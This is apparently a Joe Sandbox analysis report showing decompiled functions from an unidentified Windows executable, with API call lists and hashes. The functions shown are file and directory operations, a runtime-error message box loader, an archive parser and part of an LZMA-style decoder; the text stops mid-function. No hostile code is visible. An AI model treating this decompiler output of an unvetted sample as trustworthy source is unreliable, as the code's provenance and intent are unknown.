                                          • Instruction Fuzzy Hash: 7EE0EC75241208FBCB01CF90CD01FCE7BB9EB49754F208058E90596160D375AA14EB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040551A(void** __ecx) {
                                          				void* _t1;
                                          				int _t3;
                                          				signed int* _t6;
                                          
                                          				_t6 = __ecx;
                                          				_t1 =  *__ecx;
                                          				if(_t1 == 0xffffffff) {
                                          					L4:
                                          					return 1;
                                          				} else {
                                          					_t3 = FindClose(_t1); // executed
                                          					if(_t3 != 0) {
                                          						 *_t6 =  *_t6 | 0xffffffff;
                                          						goto L4;
                                          					} else {
                                          						return 0;
                                          					}
                                          				}
                                          			}







                                          APIs
                                          • FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                          • Instruction ID: 986561ebb0227da743eeb2b9ec995cdcc659c9848a972ac8d271436d9e92df52
                                          • Opcode Fuzzy Hash: a5f15e60ddec85d8ac06024adb1482cc35c18756887bd61c03bc9ed0d5cb4483
                                          • Instruction Fuzzy Hash: 6BD0123150452166CF745E3C7C459C333D99A123B03660BAAF4B4D32E5D3748CC35AD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00405A63(void** __ecx) {
                                          				void* _t1;
                                          				int _t3;
                                          				signed int* _t6;
                                          
                                          				_t6 = __ecx;
                                          				_t1 =  *__ecx;
                                          				if(_t1 == 0xffffffff) {
                                          					L4:
                                          					return 1;
                                          				} else {
                                          					_t3 = FindCloseChangeNotification(_t1); // executed
                                          					if(_t3 != 0) {
                                          						 *_t6 =  *_t6 | 0xffffffff;
                                          						goto L4;
                                          					} else {
                                          						return 0;
                                          					}
                                          				}
                                          			}







                                          APIs
                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,00405A2C,?,00000000,00000003,?,00000000,?,00000000), ref: 00405A6E
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                          • Instruction ID: 8a38a6d9813b312501c47e0c29c9a2f8cf12ac5fa7676fc4773f80372e0f1af5
                                          • Opcode Fuzzy Hash: 762bf37c8decbf6063af4facc99c374a5abed3ea2b8a5978318a093aad6de801
                                          • Instruction Fuzzy Hash: 5CD0C93160462146CA645E3C7C849D737D89A16330325176AF0B5D22E4D3748D875E94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00404BDC(CHAR* __ecx, void* __eflags) {
                                          				void* _t3;
                                          				signed int _t4;
                                          
                                          				_t3 = E0040489C(__ecx, 0);
                                          				if(_t3 != 0) {
                                          					_t4 = DeleteFileA(__ecx); // executed
                                          					return _t4 & 0xffffff00 | _t4 != 0x00000000;
                                          				} else {
                                          					return _t3;
                                          				}
                                          			}






                                          APIs
                                            • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          • DeleteFileA.KERNELBASE(?,?,00404DBF,?,00000000,?,?,?,?,?,00000000), ref: 00404BED
                                          Similarity
                                          • API ID: File$AttributesDelete
                                          • String ID:
                                          • API String ID: 2910425767-0
                                          • Opcode ID: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                          • Instruction ID: 9a45e8f854b003a178289988cc7fc064ae5902da4cc88310474d582750e90668
                                          • Opcode Fuzzy Hash: aaa2e24e3cadb2417611b806b2e2b1e55713074da21130e803bc74bd8fb11f06
                                          • Instruction Fuzzy Hash: 0BC08C26209231439A043ABA3805ACB171E0EC122030AC0BBB800A2059CB288DC221DC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00405C5A(void** __ecx, FILETIME* _a4, FILETIME* _a8, FILETIME* _a12) {
                                          				signed int _t4;
                                          
                                          				_t4 = SetFileTime( *__ecx, _a4, _a8, _a12); // executed
                                          				asm("sbb eax, eax");
                                          				return  ~( ~_t4);
                                          			}




                                          0x00405c68
                                          0x00405c70
                                          0x00405c74

                                          APIs
                                          • SetFileTime.KERNELBASE(?,?,?,?,00405C84,00000000,00000000,?,00402E12,?), ref: 00405C68
                                          Similarity
                                          • API ID: FileTime
                                          • String ID:
                                          • API String ID: 1425588814-0
                                          • Opcode ID: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                          • Instruction ID: 87fe90df0bd66b56430cb58ce5188ab21e49bedd0782b4bf3c7b48ca6ef22eff
                                          • Opcode Fuzzy Hash: c611d48c496a84d7274e6d5b9c1e90c61bae575044892d23a6eff34163934cc8
                                          • Instruction Fuzzy Hash: 8EC04C36158105FF8F020F70CC04C5EBFA2EB99711F10C918B269C40B0C7328024EB02
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040489C(CHAR* __ecx, long __edx) {
                                          				signed int _t3;
                                          
                                          				_t3 = SetFileAttributesA(__ecx, __edx); // executed
                                          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                          			}




                                          0x0040489e
                                          0x004048a9

                                          APIs
                                          • SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                          • Instruction ID: c0231da6564a4fbd22ddd4f059f5cfeb57e5ba4ab4dd36146b68eeddd1056acd
                                          • Opcode Fuzzy Hash: 9ef3a3077910c683e57a22045a29601e29b9581d2df390f15cf492c25b36c35e
                                          • Instruction Fuzzy Hash: 5BA002A03112059BA6145B315E0AB6F296DEDC9AE1705C56C7412C5060EB29C9505565
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0040498D(CHAR* __ecx) {
                                          				signed int _t3;
                                          
                                          				_t3 = CreateDirectoryA(__ecx, 0); // executed
                                          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                          			}




                                          0x00404990
                                          0x0040499b

                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                                          Similarity
                                          • API ID: CreateDirectory
                                          • String ID:
                                          • API String ID: 4241100979-0
                                          • Opcode ID: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                          • Instruction ID: 18df801fa9cda183c38834b8287032c54ef98b8f5de1dc60049a64e9909c76fe
                                          • Opcode Fuzzy Hash: b19b64997772cde21bab08b79878e27a599263e6d5f620d435ec54b846f4109b
                                          • Instruction Fuzzy Hash: DCA0223030030283E2200F320E0AB0F280CAF08AC0F00C02C3000C80E0FB28C000008C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004048AA(CHAR* __ecx) {
                                          				signed int _t3;
                                          
                                          				_t3 = RemoveDirectoryA(__ecx); // executed
                                          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                          			}




                                          0x004048ab
                                          0x004048b6

                                          APIs
                                          • RemoveDirectoryA.KERNELBASE(?,00404D27,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 004048AB
                                          Similarity
                                          • API ID: DirectoryRemove
                                          • String ID:
                                          • API String ID: 597925465-0
                                          • Opcode ID: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                                          • Instruction ID: 8a2519b774f471bade5b05e48f192836a719b77eeaa2736f11b150acbb720719
                                          • Opcode Fuzzy Hash: 5eb19e86367385bc71ec08970d66f6ec81c8b6c1d5f16cf833c81eadf1f07443
                                          • Instruction Fuzzy Hash: E7A002603112058796241B315F0968F295D9D455D1706C5696516C4060DB29C5505555
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00418320(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				intOrPtr* _t4;
                                          				intOrPtr* _t7;
                                          				_Unknown_base(*)()* _t11;
                                          				void* _t14;
                                          				struct HINSTANCE__* _t15;
                                          				void* _t17;
                                          
                                          				_t14 = 0;
                                          				_t17 =  *0x423514 - _t14; // 0x0
                                          				if(_t17 != 0) {
                                          					L4:
                                          					_t4 =  *0x423518; // 0x0
                                          					if(_t4 != 0) {
                                          						_t14 =  *_t4();
                                          						if(_t14 != 0) {
                                          							_t7 =  *0x42351c; // 0x0
                                          							if(_t7 != 0) {
                                          								_t14 =  *_t7(_t14);
                                          							}
                                          						}
                                          					}
                                          					return  *0x423514(_t14, _a4, _a8, _a12);
                                          				}
                                          				_t15 = LoadLibraryA("user32.dll");
                                          				if(_t15 == 0) {
                                          					L10:
                                          					return 0;
                                          				}
                                          				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                          				 *0x423514 = _t11;
                                          				if(_t11 == 0) {
                                          					goto L10;
                                          				} else {
                                          					 *0x423518 = GetProcAddress(_t15, "GetActiveWindow");
                                          					 *0x42351c = GetProcAddress(_t15, "GetLastActivePopup");
                                          					goto L4;
                                          				}
                                          			}










                                          APIs
                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,00000000,0041795A,?,Microsoft Visual C++ Runtime Library,00012010,?,0041BD2C,?,0041BD7C,?,?,?,Runtime Error!Program: ), ref: 00418332
                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 0041834A
                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041835B
                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00418368
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                          • API String ID: 2238633743-4044615076
                                          • Opcode ID: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                          • Instruction ID: e87ed1bb16eb8be6f8b96595097180185a60ce52c98033cfd4ddfb8cddd90555
                                          • Opcode Fuzzy Hash: 3f0a24d6d85b05054a3dd2e72677b881a91c1b783ec14cf3ede4e9bf1f2578f7
                                          • Instruction Fuzzy Hash: C50179713002057F87209FB59C80A9B7AF4EB44B45318003EB558C3251DB6DCFC29BE9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E0040E5A5(intOrPtr __ecx, signed int __edx) {
                                          				signed int _t133;
                                          				intOrPtr _t135;
                                          				signed int _t136;
                                          				signed int _t137;
                                          				signed int _t148;
                                          				intOrPtr _t159;
                                          				signed int _t160;
                                          				intOrPtr _t162;
                                          				void* _t164;
                                          				signed int _t167;
                                          				intOrPtr _t175;
                                          				signed int _t177;
                                          				signed int _t183;
                                          				intOrPtr _t184;
                                          				intOrPtr _t185;
                                          				intOrPtr _t201;
                                          				signed int _t211;
                                          				signed int _t214;
                                          				signed int _t215;
                                          				intOrPtr _t217;
                                          				signed int _t218;
                                          				void* _t219;
                                          				void* _t220;
                                          				void* _t221;
                                          				signed int _t223;
                                          				signed int _t225;
                                          				void* _t226;
                                          
                                          				_t211 = __edx;
                                          				E00413954(E0041A690, _t226);
                                          				_t175 = __ecx;
                                          				 *((intOrPtr*)(_t226 - 0x14)) = __ecx;
                                          				E004042D6();
                                          				_t223 =  *(_t226 + 8);
                                          				E00404327( *((intOrPtr*)(_t226 + 0xc)),  *(_t223 + 8));
                                          				while(1) {
                                          					_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          					_t183 = _t211;
                                          					 *(_t226 - 0x1c) = _t133;
                                          					 *(_t226 - 0x18) = _t183;
                                          					if(_t133 != 0xd) {
                                          						goto L6;
                                          					}
                                          					L2:
                                          					_t211 = 0;
                                          					if(_t183 != 0) {
                                          						L7:
                                          						__eflags = _t133 - 0xa;
                                          						if(_t133 != 0xa) {
                                          							L9:
                                          							__eflags = _t133 - 9;
                                          							if(_t133 != 9) {
                                          								L11:
                                          								__eflags = _t133 | _t183;
                                          								if((_t133 | _t183) == 0) {
                                          									L13:
                                          									_t135 =  *((intOrPtr*)(_t226 + 0xc));
                                          									__eflags =  *((intOrPtr*)(_t135 + 8)) - _t211;
                                          									if( *((intOrPtr*)(_t135 + 8)) != _t211) {
                                          										L17:
                                          										_t184 =  *((intOrPtr*)(_t226 + 0xc));
                                          										_t214 = 0;
                                          										 *(_t226 - 0x10) = 0;
                                          										__eflags =  *((intOrPtr*)(_t184 + 8)) - _t211;
                                          										if( *((intOrPtr*)(_t184 + 8)) <= _t211) {
                                          											L27:
                                          											__eflags =  *(_t226 - 0x1c) - 9;
                                          											if( *(_t226 - 0x1c) == 9) {
                                          												__eflags =  *(_t226 - 0x18) - _t211;
                                          												if( *(_t226 - 0x18) == _t211) {
                                          													_t160 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          													_t184 =  *((intOrPtr*)(_t226 + 0xc));
                                          													 *(_t226 - 0x18) = _t211;
                                          													 *(_t226 - 0x1c) = _t160;
                                          													_t211 = 0;
                                          													__eflags = 0;
                                          												}
                                          											}
                                          											_t215 =  *(_t223 + 8);
                                          											 *(_t226 - 0x10) = _t211;
                                          											__eflags = _t215 - _t211;
                                          											 *(_t226 + 8) = _t211;
                                          											if(_t215 <= _t211) {
                                          												L37:
                                          												_t136 =  *(_t226 - 0x1c);
                                          												__eflags = _t136 - 0xa;
                                          												if(_t136 != 0xa) {
                                          													L48:
                                          													_t137 = _t136 |  *(_t226 - 0x18);
                                          													__eflags = _t137;
                                          													if(_t137 == 0) {
                                          														_t185 =  *((intOrPtr*)(_t226 + 0x14));
                                          														__eflags =  *((intOrPtr*)(_t185 + 8)) - _t211;
                                          														if( *((intOrPtr*)(_t185 + 8)) != _t211) {
                                          															L54:
                                          															 *[fs:0x0] =  *((intOrPtr*)(_t226 - 0xc));
                                          															return _t137;
                                          														}
                                          														E0040D9F9(_t185,  *(_t226 + 8));
                                          														_t137 = E004042D6();
                                          														_t225 =  *(_t226 + 8);
                                          														__eflags = _t225;
                                          														if(_t225 <= 0) {
                                          															goto L54;
                                          														} else {
                                          															goto L53;
                                          														}
                                          														do {
                                          															L53:
                                          															_t137 = E004039DF( *((intOrPtr*)(_t226 + 0x18)), 0);
                                          															_t225 = _t225 - 1;
                                          															__eflags = _t225;
                                          														} while (_t225 != 0);
                                          														goto L54;
                                          													}
                                          													E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          													L50:
                                          													 *(_t226 - 0x1c) = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          													 *(_t226 - 0x18) = _t211;
                                          													goto L36;
                                          												}
                                          												__eflags =  *(_t226 - 0x18) - _t211;
                                          												if(__eflags != 0) {
                                          													goto L48;
                                          												}
                                          												 *(_t226 - 0x48) = _t211;
                                          												 *(_t226 - 0x44) = _t211;
                                          												 *(_t226 - 0x40) = _t211;
                                          												 *((intOrPtr*)(_t226 - 0x3c)) = 1;
                                          												 *((intOrPtr*)(_t226 - 0x4c)) = 0x41b748;
                                          												 *(_t226 - 4) = _t211;
                                          												 *(_t226 - 0x34) = _t211;
                                          												 *(_t226 - 0x30) = _t211;
                                          												 *(_t226 - 0x2c) = _t211;
                                          												 *((intOrPtr*)(_t226 - 0x28)) = 4;
                                          												 *((intOrPtr*)(_t226 - 0x38)) = 0x41b684;
                                          												 *(_t226 - 4) = 1;
                                          												E0040E23F(_t175, __eflags,  *(_t226 - 0x10), _t226 - 0x4c, _t226 - 0x38);
                                          												_t177 = 0;
                                          												__eflags =  *(_t223 + 8);
                                          												 *(_t226 + 0x10) = 0;
                                          												if( *(_t223 + 8) <= 0) {
                                          													L47:
                                          													 *(_t226 - 4) =  *(_t226 - 4) & 0x00000000;
                                          													E004042AD(_t226 - 0x38);
                                          													 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                                          													E004042AD(_t226 - 0x4c);
                                          													_t175 =  *((intOrPtr*)(_t226 - 0x14));
                                          													goto L50;
                                          												} else {
                                          													goto L40;
                                          												}
                                          												do {
                                          													L40:
                                          													_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t177 * 4));
                                          													_t148 =  *( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)) + 0xc)) + _t177 * 4);
                                          													__eflags = _t148 - 1;
                                          													if(_t148 != 1) {
                                          														L43:
                                          														__eflags = _t148;
                                          														if(_t148 <= 0) {
                                          															goto L46;
                                          														}
                                          														_t218 = _t148;
                                          														do {
                                          															E0040C413( *((intOrPtr*)(_t226 + 0x14)),  *((intOrPtr*)( *(_t226 - 0x40) +  *(_t226 + 0x10))));
                                          															E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)( *(_t226 - 0x2c) +  *(_t226 + 0x10) * 4)));
                                          															 *(_t226 + 0x10) =  *(_t226 + 0x10) + 1;
                                          															_t218 = _t218 - 1;
                                          															__eflags = _t218;
                                          														} while (_t218 != 0);
                                          														goto L46;
                                          													}
                                          													__eflags =  *((char*)(_t217 + 0x54));
                                          													if( *((char*)(_t217 + 0x54)) == 0) {
                                          														goto L43;
                                          													}
                                          													E0040C413( *((intOrPtr*)(_t226 + 0x14)), _t148);
                                          													E004039DF( *((intOrPtr*)(_t226 + 0x18)),  *((intOrPtr*)(_t217 + 0x50)));
                                          													L46:
                                          													_t177 = _t177 + 1;
                                          													__eflags = _t177 -  *(_t223 + 8);
                                          												} while (_t177 <  *(_t223 + 8));
                                          												goto L47;
                                          											} else {
                                          												 *(_t226 + 0x10) =  *(_t184 + 0xc);
                                          												do {
                                          													_t201 =  *((intOrPtr*)( *(_t226 + 0x10) + _t211 * 4));
                                          													__eflags = _t201 - 1;
                                          													if(_t201 != 1) {
                                          														L34:
                                          														_t64 = _t226 - 0x10;
                                          														 *_t64 =  *(_t226 - 0x10) + _t201;
                                          														__eflags =  *_t64;
                                          														goto L35;
                                          													}
                                          													_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t211 * 4));
                                          													__eflags =  *((char*)(_t159 + 0x54));
                                          													if( *((char*)(_t159 + 0x54)) != 0) {
                                          														goto L35;
                                          													}
                                          													goto L34;
                                          													L35:
                                          													 *(_t226 + 8) =  *(_t226 + 8) + _t201;
                                          													_t211 = _t211 + 1;
                                          													__eflags = _t211 - _t215;
                                          												} while (_t211 < _t215);
                                          												L36:
                                          												_t211 = 0;
                                          												__eflags = 0;
                                          												goto L37;
                                          											}
                                          										} else {
                                          											goto L18;
                                          										}
                                          										do {
                                          											L18:
                                          											_t162 =  *((intOrPtr*)( *(_t184 + 0xc) + _t214 * 4));
                                          											__eflags = _t162 - _t211;
                                          											if(_t162 == _t211) {
                                          												goto L26;
                                          											}
                                          											__eflags = _t162 - 1;
                                          											 *(_t226 - 0x24) = _t211;
                                          											 *(_t226 - 0x20) = _t211;
                                          											if(_t162 <= 1) {
                                          												L25:
                                          												_t164 = E0040C281( *((intOrPtr*)( *((intOrPtr*)(_t223 + 0xc)) + _t214 * 4)));
                                          												asm("sbb edx, [ebp-0x20]");
                                          												E0040F953( *(_t226 + 0x10), _t164 -  *(_t226 - 0x24), _t211);
                                          												_t184 =  *((intOrPtr*)(_t226 + 0xc));
                                          												_t211 = 0;
                                          												__eflags = 0;
                                          												goto L26;
                                          											}
                                          											_t167 = _t162 - 1;
                                          											__eflags = _t167;
                                          											 *(_t226 + 8) = _t167;
                                          											do {
                                          												__eflags =  *(_t226 - 0x1c) - 9;
                                          												if( *(_t226 - 0x1c) == 9) {
                                          													__eflags =  *(_t226 - 0x18) - _t211;
                                          													if( *(_t226 - 0x18) == _t211) {
                                          														_t219 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          														E0040F953( *(_t226 + 0x10), _t219, _t211);
                                          														 *(_t226 - 0x24) =  *(_t226 - 0x24) + _t219;
                                          														_t214 =  *(_t226 - 0x10);
                                          														asm("adc [ebp-0x20], ebx");
                                          														_t175 =  *((intOrPtr*)(_t226 - 0x14));
                                          														_t211 = 0;
                                          														__eflags = 0;
                                          													}
                                          												}
                                          												_t36 = _t226 + 8;
                                          												 *_t36 =  *(_t226 + 8) - 1;
                                          												__eflags =  *_t36;
                                          											} while ( *_t36 != 0);
                                          											goto L25;
                                          											L26:
                                          											_t214 = _t214 + 1;
                                          											__eflags = _t214 -  *((intOrPtr*)(_t184 + 8));
                                          											 *(_t226 - 0x10) = _t214;
                                          										} while (_t214 <  *((intOrPtr*)(_t184 + 8)));
                                          										goto L27;
                                          									}
                                          									_t220 = 0;
                                          									__eflags =  *(_t223 + 8) - _t211;
                                          									if( *(_t223 + 8) <= _t211) {
                                          										goto L17;
                                          									} else {
                                          										goto L15;
                                          									}
                                          									do {
                                          										L15:
                                          										E004039DF( *((intOrPtr*)(_t226 + 0xc)), 1);
                                          										_t220 = _t220 + 1;
                                          										__eflags = _t220 -  *(_t223 + 8);
                                          									} while (_t220 <  *(_t223 + 8));
                                          									_t211 = 0;
                                          									__eflags = 0;
                                          									goto L17;
                                          								}
                                          								E0040DBE1( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          								while(1) {
                                          									_t133 = E0040DBF4( *((intOrPtr*)(_t175 + 0x18)), _t211);
                                          									_t183 = _t211;
                                          									 *(_t226 - 0x1c) = _t133;
                                          									 *(_t226 - 0x18) = _t183;
                                          									if(_t133 != 0xd) {
                                          										goto L6;
                                          									}
                                          									goto L2;
                                          								}
                                          								goto L6;
                                          							}
                                          							__eflags = _t183 - _t211;
                                          							if(_t183 == _t211) {
                                          								goto L13;
                                          							}
                                          							goto L11;
                                          						}
                                          						__eflags = _t183 - _t211;
                                          						if(_t183 == _t211) {
                                          							goto L13;
                                          						}
                                          						goto L9;
                                          					}
                                          					_t221 = 0;
                                          					if( *(_t223 + 8) <= 0) {
                                          						continue;
                                          					} else {
                                          						goto L4;
                                          					}
                                          					do {
                                          						L4:
                                          						E004039DF( *((intOrPtr*)(_t226 + 0xc)), E0040DC90(0));
                                          						_t221 = _t221 + 1;
                                          					} while (_t221 <  *(_t223 + 8));
                                          					continue;
                                          					L6:
                                          					_t211 = 0;
                                          					__eflags = 0;
                                          					goto L7;
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                                          • Instruction ID: 21f6de2b17b1780f59bfe67bff07a3778763215a5d034522e7ff50d1aecbc74d
                                          • Opcode Fuzzy Hash: b07fb5bf97a2b1aa00d72e408e60a61c646f09191d68c079a122928f862f61c3
                                          • Instruction Fuzzy Hash: 86A1FA70E002099FCB18DF96C4919AEB7B2FFA4314F14887FE815A7291DB39AD61CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E004126B0(void* __eax, signed int* __ecx) {
                                          				intOrPtr _t149;
                                          				unsigned int _t153;
                                          				signed int _t157;
                                          				signed int _t158;
                                          				intOrPtr _t159;
                                          				signed int _t160;
                                          				signed int _t161;
                                          				signed char* _t162;
                                          				signed int _t164;
                                          				intOrPtr _t167;
                                          				signed int _t168;
                                          				signed char* _t169;
                                          				signed int _t171;
                                          				signed char* _t179;
                                          				signed int _t190;
                                          				signed int _t192;
                                          				signed int _t196;
                                          				signed char* _t197;
                                          				signed char* _t199;
                                          				signed int _t204;
                                          				signed short* _t205;
                                          				void* _t206;
                                          				signed int _t207;
                                          				signed int _t215;
                                          				signed int _t216;
                                          				signed char* _t225;
                                          				signed int _t228;
                                          				signed int _t232;
                                          				signed int _t235;
                                          				signed int _t238;
                                          				signed int _t241;
                                          				signed int _t244;
                                          				signed int _t247;
                                          				signed char _t251;
                                          				void* _t252;
                                          				signed int _t265;
                                          				signed int _t270;
                                          				signed int _t271;
                                          				signed int _t272;
                                          				signed int _t278;
                                          				signed char* _t279;
                                          				signed int _t281;
                                          				signed int _t283;
                                          				signed int _t284;
                                          				signed int _t285;
                                          				signed int _t286;
                                          				signed int _t287;
                                          				signed int _t288;
                                          				signed int _t289;
                                          				signed int _t290;
                                          				unsigned int _t291;
                                          				signed int* _t292;
                                          				intOrPtr _t293;
                                          				signed char* _t294;
                                          				signed short* _t296;
                                          				signed int _t297;
                                          				signed int _t298;
                                          				signed int _t300;
                                          				signed int _t301;
                                          				signed int _t310;
                                          				signed int _t314;
                                          				signed int _t319;
                                          				signed int _t320;
                                          				signed int _t321;
                                          				signed int _t322;
                                          				signed int _t323;
                                          				signed int _t324;
                                          				signed int _t325;
                                          				signed int _t340;
                                          				signed int _t341;
                                          				signed int _t342;
                                          				signed char* _t344;
                                          				void* _t351;
                                          
                                          				_t292 = __ecx;
                                          				_t340 =  *(__ecx + 0x34);
                                          				_t283 =  *(__ecx + 0x1c);
                                          				_t321 =  *(__ecx + 0x20);
                                          				_t149 =  *((intOrPtr*)(__ecx + 0x10));
                                          				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
                                          				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
                                          				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
                                          				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
                                          				if(_t283 >= 0x1000000) {
                                          					L4:
                                          					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
                                          					if(_t321 >= _t153) {
                                          						_t293 =  *((intOrPtr*)(_t351 + 0x14));
                                          						_t225 =  *(_t351 + 0x28);
                                          						_t284 = _t283 - _t153;
                                          						_t322 = _t321 - _t153;
                                          						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
                                          						if(_t284 >= 0x1000000) {
                                          							L39:
                                          							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
                                          							if(_t322 >= _t157) {
                                          								_t285 = _t284 - _t157;
                                          								_t323 = _t322 - _t157;
                                          								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
                                          								 *(_t351 + 0x1c) = 3;
                                          								if(_t285 >= 0x1000000) {
                                          									L44:
                                          									_t228 = (_t285 >> 0xb) * _t158;
                                          									_t159 =  *((intOrPtr*)(_t351 + 0x14));
                                          									if(_t323 >= _t228) {
                                          										_t294 =  *(_t351 + 0x28);
                                          										_t286 = _t285 - _t228;
                                          										_t324 = _t323 - _t228;
                                          										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
                                          										if(_t286 >= 0x1000000) {
                                          											L55:
                                          											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
                                          											if(_t324 >= _t232) {
                                          												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
                                          												_t287 = _t286 - _t232;
                                          												_t323 = _t324 - _t232;
                                          												if(_t287 >= 0x1000000) {
                                          													L60:
                                          													_t235 = (_t287 >> 0xb) * _t160;
                                          													if(_t323 >= _t235) {
                                          														goto L62;
                                          													} else {
                                          														_t288 = _t235;
                                          													}
                                          													goto L63;
                                          												} else {
                                          													if(_t294 >=  *(_t351 + 0x10)) {
                                          														goto L2;
                                          													} else {
                                          														_t287 = _t287 << 8;
                                          														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
                                          														 *(_t351 + 0x28) =  &(_t294[1]);
                                          														goto L60;
                                          													}
                                          												}
                                          											} else {
                                          												_t288 = _t232;
                                          												goto L63;
                                          											}
                                          										} else {
                                          											if(_t294 >=  *(_t351 + 0x10)) {
                                          												goto L2;
                                          											} else {
                                          												_t286 = _t286 << 8;
                                          												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
                                          												_t294 =  &(_t294[1]);
                                          												 *(_t351 + 0x28) = _t294;
                                          												goto L55;
                                          											}
                                          										}
                                          									} else {
                                          										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
                                          										_t179 =  *(_t351 + 0x28);
                                          										_t287 = _t228;
                                          										if(_t228 >= 0x1000000) {
                                          											L48:
                                          											_t235 = (_t287 >> 0xb) * _t314;
                                          											if(_t323 >= _t235) {
                                          												L62:
                                          												_t288 = _t287 - _t235;
                                          												_t323 = _t323 - _t235;
                                          												L63:
                                          												_t225 =  *(_t351 + 0x28);
                                          												 *(_t351 + 0x20) = 0xc;
